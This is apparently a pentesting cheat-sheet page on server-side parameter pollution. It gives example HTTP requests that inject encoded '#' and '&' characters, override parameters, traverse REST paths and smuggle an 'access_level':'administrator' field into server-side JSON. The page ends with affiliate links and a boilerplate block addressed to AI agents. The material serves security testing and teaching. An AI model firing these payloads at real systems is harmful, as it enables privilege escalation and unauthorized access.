# Server Side Parameter Pollution [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) Place query syntax characters like `#`, `&`, and `=` in your input and observe how the application responds ## Example: ``` GET /profile?user=1001%23//evil.com OR %26role=admin (URL Encoded: %23># and %26>&) GET /profile?user=1001%26admin=true ``` {% hint style="warning" %} *It's essential that you URL-encode the `#` character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.* {% endhint %} ``` GET /userSearch?name=peter&back=/home 1 - Try GET /userSearch?name=peter%23foo&back=/home GET /userSearch?name=peter%26foo=xyz&back=/home 2 - If you've identified the email parameter, you could add it to the query string GET /userSearch?name=peter%26email=foo&back=/home ``` ## Overriding parameters ``` GET /userSearch?name=peter%26name=carlos&back=/home GET /profile?user=1001%26user=2121 ``` {% hint style="info" %} * *PHP parses the last parameter only. This would result in a user search for `carlos`.* * *ASP.NET combines both parameters. This would result in a user search for `peter,carlos`, which might result in an `Invalid username` error message.* * *Node.js / express parses the first parameter only. This would result in a user search for `peter`, giving an unchanged result.* {% endhint %} ## REST Paths ``` GET /edit_profile.php?name=peter%2f..%2fadmin ``` This may result in the following server-side request: `GET /api/private/users/peter/../admin` ## Structured data ### Example 1 ``` POST /myaccount name=peter # Server Side: PATCH /users/7312/update {"name":"peter"} ``` You can attempt to add the `access_level` parameter to the request as follows: ``` POST /myaccount name=peter","access_level":"administrator ``` If the user input is added to the server-side JSON data without adequate validation or sanitization, this results in the following server-side request: ``` PATCH /users/7312/update {name="peter","access_level":"administrator"} ``` ### Example 2 ``` POST /myaccount {"name": "peter"} # Server Side PATCH /users/7312/update {"name":"peter"} ``` Add access\_level ``` POST /myaccount {"name": "peter\",\"access_level\":\"administrator"} # Server side PATCH /users/7312/update {"name":"peter","access_level":"administrator"} ``` ### Burp Extension - Backslash Powered Scanning {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**Hacking APIs: Breaking Web Application Programming Interfaces**](https://www.amazon.fr/dp/1718502443?tag=0xss0rz-21)\ A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure. * [**Black Hat GraphQL: Attacking Next Generation APIs**](https://www.amazon.fr/dp/B0B7Q8BYG1?tag=0xss0rz-21)\ This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/api/server-side-parameter-pollution.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.